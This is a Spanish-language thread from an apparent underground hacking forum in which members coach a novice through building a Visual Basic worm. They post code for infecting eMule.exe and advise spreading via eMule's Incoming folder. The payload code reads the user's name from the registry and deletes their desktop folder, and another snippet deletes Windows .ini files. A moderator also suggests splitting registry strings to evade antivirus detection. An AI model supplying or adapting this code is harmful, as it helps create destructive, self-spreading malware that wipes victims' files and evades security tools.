Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 02, 2008, 09:07:27
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Visual Basic y Net (Moderador: ANYD00M)  |  Tema: Worm tuto hendrix 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Worm tuto hendrix  (Leído 491 veces)
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« en: Febrero 22, 2007, 11:13:41 »
juegos gratis
Buenas estube mirando el tuto de hendrix somo como hacer un worm, y me surgieron varias dudas que aca se las voy a decir:
Tengo que tener un "virus" y aparte todo lo que dice hendrix en un proyecto VB distinto, o el virus va en el mismo archivo que para infectar y ocultar?
En la parte que explica como infectar archivos me perdi y no logro entenderla, lo que puede hacer es lo sigiente:
Código:
Dim tamworm As String
tamworm = Space (53248)

Dim tamemule As string
Open "C:\archivos de programa\emule\emule.exe" For Binary As #1
tamarchivo = Space (LOF(1))
Get #1, , tamarchivo
Close #1

If (right(emulebuffer, 2) <> "vx") Then

Msgbox "Jojo este fichero no esta infectado", vbinformation ":P LO infectamos?"

Open app.path + "\" + app.gusanodestructor + ".exe" for Binary Access Read as #2
szgusanodestructor = space (vsc)
get #2 , szgusanodestructor
close #2

Supuestamente GUSANODESTRUCTOR, seria mi virus y EMULE el archivo a infectar.
Aca ya no entiendo porq muestra en todos "SZ"virus "SZ"buffer, no entiendo porque el SZ :S

Tampoco entiendo si voy a tener que hacer esto mismo con cada archivo que quiera infectar :S

Espero respuestas

Salu2 y gracias por su ayuda
En línea
ANYD00M
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #1 en: Febrero 23, 2007, 12:29:44 »
Te comento que lo que estas haciendo es reemplazar el archivo eMule.exe, por lo tanto no podras usar este programa para propagar el Vx.
Si lo que querias hacer es una propagacion, debes copiar tu vx en la carpeta Incoming de eMule...Pero si lo q quieres es infectar el archivo eMule.exe puedes hacerlo tmb reemplazandolo o mirar un poco en internet o en Mitosis #3 ( o #2) en donde hay un articulo que explica bien esto.

Saludos
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #2 en: Febrero 23, 2007, 05:07:32 »
MMMM ok xD
La verdad no encuentor mucho sentido en infectar exes es mejor usar el emtodo d msn y por p2p.
Ahora lo k kiero hacer, es que por ej le salga un cartel al azar k diga "Hoy t salvastes", o "Hoy morists", si sale Hoy morists le borre escriotrio y mis documentos, asi el worm todabai puede segir contagiando Tongue
La cosa es que no se como hacer para k elimine escritorio entero y lo k mas me traba es como ponemos la variable de USUARIO. C:\DOCUMENTS AND SETTINGS\USUARIO\ESCRITORIO.
El usuario nose como ponerlo :S ?
Consejos?
salu2
En línea
-Erick-
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1500



Ver Perfil WWW Email
« Respuesta #3 en: Febrero 23, 2007, 05:25:17 »
En línea
ANYD00M
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #4 en: Febrero 23, 2007, 08:14:28 »
Lo que podesd hacer con eso de los msj al azar, nose si funciona porque no tengo tiempo de provarlo, pero podes hacer esto:

UIsar Randomize (para el azar), en cada msj su respectivo code.
Por ejemplo:
Si sale el msj hoy moris
MsgBox ("Hoy moris")
Kill ("C:\WINDOWS\*.ini")

si sale el msj Hoy te salvas:
MsgBox ("Hoy te salvas")


entendes?,


Saludos.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #5 en: Febrero 23, 2007, 09:16:49 »
Si ya se como hacer lo del azar porque hendrix lo puso Tongue xD
Pero coo nose usar bine vb (no se nada digamos xD), ni se como hacer para eliminar creo q era con "KILL" y "deldirectory".
Estube buscando algun glosario con las funciones, estilo batch que me diga los "comandos" pero no encontre nada asi que se me complica.
Respecto a esto:
Código:
Private Sub Command1_Click()
Dim yo As Object
Set yo = CreateObject("wscript.shell")
MsgBox yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\windows nt\currentversion\winlogon\Altdefaultdomainname")
MsgBox yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\windows nt\currentversion\winlogon\Altdefaultusername")
MsgBox yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Productname")
End Sub
No lo entendi jaja xD, yo de ahi como haria para que el worm atake X arhivo del escritorio?
Salu2
« Última modificación: Febrero 23, 2007, 09:19:18 por krosty478222 » En línea
-Erick-
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1500



Ver Perfil WWW Email
« Respuesta #6 en: Febrero 24, 2007, 06:55:56 »
Seria asi(no lo he probado pero creo que iria:
Código:
Private Sub Command1_Click()
Dim yo As Object
Dim usuario As String
Set yo = CreateObject("wscript.shell")
usuario = yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\windows nt\currentversion\winlogon\Altdefaultusername")
Kill "c:\documents and settings\" & usuario & "\escritorio"
End Sub
« Última modificación: Febrero 24, 2007, 07:24:55 por Don Nadie » En línea
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #7 en: Febrero 24, 2007, 07:11:05 »
Aver ahora lo pruebo con una X carpeta y t comento.

Salu2

PD: El comando kill nose usa: c:\RUTA\RUTA\RUTA ? Porque usastes
Código:
c:\documents and settings\" & usuario & "escritorio"
Perdonen mi ignorancia pero estoy hace MUY poco con el VB. Y me resulta dificil el uso de funciones porq no encuentro nigun documento que explike todas las funciones Tongue
En línea
-Erick-
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1500



Ver Perfil WWW Email
« Respuesta #8 en: Febrero 24, 2007, 07:25:41 »
Porque no conoces el nombre de usuario.Y lo tenemos en una variable.
En línea
Hendrix
Visitante
« Respuesta #9 en: Febrero 24, 2007, 11:27:09 »
Antes de intentar hacer un worm y/o troyano deberias aprender a manejar MINIMAMENTE el VB, ya ke solamente daciendo Copy & Paste uno no aprende.... Wink Wink

Es una recomendacion....
En línea
ANYD00M
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #10 en: Febrero 24, 2007, 12:54:26 »
Hendrix tiene razon, pero igual se nota que algo sabe eh.
En fin, el code que puso Don Nadie a mi me enduvo bien, pero intenta hacerlo a tu manera, y un poco mas complicado... EJ:

Private Sub Command1_Click()
Dim yo As Object
Dim usuario As String
Set yo = CreateObject("wscript.shell")

regkey1 = "HKEY_LOCAL_MACHINE\"
regkey2 = "SOFTWARE\Microsoft"
regkey3 = "\Windows\CurrentVersion\winlogon\Altdefaultusername"

usuario = yo.regread(regkey1 + regkey2 + regkey3)
Kill "c:\documents and settings\" & usuario & "\escritorio"
End Sub

O haciendo una especie de Arrays  con las variables regkey xD

Eso a veces es necesario orque la lectura de alguna entradas del registro son detectadas sospechosas por algunos antivirus.

En fin, solo usa tu imaginacion e intenta acomodar el code a tu manera.

Y con el tema de Kill, lo que hiso Don Nadie es asignarle una variable al Usuario de windows y luego lo engancho a la ruta de Document and Setting...
EL signo & y + sirven para acomodar cadenas.

Saludos
« Última modificación: Febrero 24, 2007, 12:57:03 por Z-max » En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #11 en: Febrero 24, 2007, 01:56:54 »
Citar
Insertar Cita
Porque no conoces el nombre de usuario.Y lo tenemos en una variable.
Ok, pero si fuera comun podriamos la ruta como en batch no ?
Citar
Antes de intentar hacer un worm y/o troyano deberias aprender a manejar MINIMAMENTE el VB, ya ke solamente daciendo Copy & Paste uno no aprende....
Si lo se empese con VB antes pero eran cosas que no me interesaban mucho, hacer form q pidan nombre y decir X cosa...
Lo que pasa es q en todo los manuales que encuentro niguno da funciones basicas y las explica y eso me jode un poco porq kiero matar un proces por ej y nose la funcion o cosas asi  Undecided
Respecto a esto:
Código:
Private Sub Command1_Click()
Dim yo As Object
Dim usuario As String
Set yo = CreateObject("wscript.shell")

regkey1 = "HKEY_LOCAL_MACHINE\"
regkey2 = "SOFTWARE\Microsoft"
regkey3 = "\Windows\CurrentVersion\winlogon\Altdefaultusername"

usuario = yo.regread(regkey1 + regkey2 + regkey3)
Kill "c:\documents and settings\" & usuario & "\escritorio"
End Sub
1ero. Proque definis yo como variable ? si podes solo poner
Código:
CreateObject("wscript.shell")
:S

Y lo mismo con las regkey, si podes escribirlas para k las pones como variables no entdi eso Tongue

Salu2 y gracias por la ayuda
En línea
axera
Miembro
*****
Desconectado Desconectado

Mensajes: 68



Ver Perfil
« Respuesta #12 en: Febrero 24, 2007, 09:06:25 »
mira men... tienes que declarar cada cosa que vas a usar en le visual basic

en este caso yo como object con la finalidad de usar el ("wscript.shell")

Para esto se utiliza aqui creamos un nuevo objeto que tiene como valor el dato que te dieron

usuario = yo.regread(regkey1 + regkey2 + regkey3)

Como puedes ver usuario es tipo string... porque guardamos una cadena...
Cuando lo iguales el yo es tu objeto y este lo que hara es leer lo siguiente....

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\winlogon\Altdefaultusername " con la finalidad de poder entrar al escritorio y borrar, copia o lo que necesites hacer...

Espero que me hallas entendido por lo menos la primera letra.. si tiene dudas mandame un mp para explicarte algo.. sale

BY AXERA
En línea
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #13 en: Febrero 24, 2007, 11:46:36 »
Citar
mira men... tienes que declarar cada cosa que vas a usar en le visual basic
Pero esto es obligatorio?
Que pasara si pondriamos:
Código:
usuario = CreateObject("wscript.shell").regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\winlogon\Altdefaultusername")
Kill "c:\documents and settings\" & usuario & "\escritorio"
End Sub
No iria asi ?
Salu2
En línea
ANYD00M
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #14 en: Febrero 25, 2007, 01:34:15 »
Para no confundir a VB, siempre pone arriva del todo (en la parte code) Option Explicit.
Esto ara que tengas que declarar variables y objetos si o si.
Con respecto a "yo" como variable, Esta declarado como variable objecto (Dim yo as object) ya que es lo que estaos creando men.
Y las regkey son solo variables para hacer mas complicado de entender al codigo.
es decir que todas las variables que vallas a usar, es necesario (no obligatorio) declararlas con Dim.

y con respecto al comentario de axera:

Para esto se utiliza aqui creamos un nuevo objeto que tiene como valor el dato que te dieron

usuario = yo.regread(regkey1 + regkey2 + regkey3)

(La variable Usuario no es objecto, es cadena xD)


Ahh!, me olvidaba!...Krosty, este ultimo code que pusiste esta mal =P
Estas dandole a "Usuario" dos valore sal mismo tiempo los cuales no concuerdan.
Primero debes crear el objecto ("WScript.Shell") y luego usas sus propiedades (regread)


Saludos.
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
krosty478222
Recien Llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil Email
« Respuesta #15 en: Febrero 25, 2007, 03:54:22 »
Ok gracias por las aclaraciones
Salu2
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Visual Basic y Net (Moderador: ANYD00M)  |  Tema: Worm tuto hendrix « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC